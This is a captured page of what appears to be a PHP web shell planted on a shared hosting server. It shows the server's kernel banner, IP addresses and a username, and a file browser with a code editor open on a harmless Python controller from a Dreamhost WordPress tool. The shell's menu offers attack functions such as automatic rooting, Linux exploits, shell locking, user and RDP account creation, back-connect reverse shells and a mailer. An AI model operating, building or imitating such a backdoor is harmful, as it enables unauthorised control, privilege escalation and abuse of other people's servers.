Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
bin /
dhwp /
dhwp /
controllers /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
0
B
-rw-rw-r--
base.py
865
B
-rw-rw-r--
install.py
7.57
KB
-rw-rw-r--
metrics.py
3.85
KB
-rw-rw-r--
stage.py
6.99
KB
-rw-rw-r--
test.py
3.28
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : base.py
from cement import Controller, ex from cement.utils.version import get_version_banner from ..core.version import get_version VERSION_BANNER = """ Dreamhost WP Management Tool %s %s """ % (get_version(), get_version_banner()) class Base(Controller): class Meta: label = 'base' # text displayed at the top of --help output description = 'Dreamhost WP Management Tool' # text displayed at the bottom of --help output epilog = 'Usage: dhwp command --foo bar' # controller level arguments. ex: 'dhwp --version' arguments = [ # add a version banner (['-v', '--version'], {'action': 'version', 'version': VERSION_BANNER}), ] def _default(self): """Default action if no sub-command is passed.""" self.app.args.print_help()
Close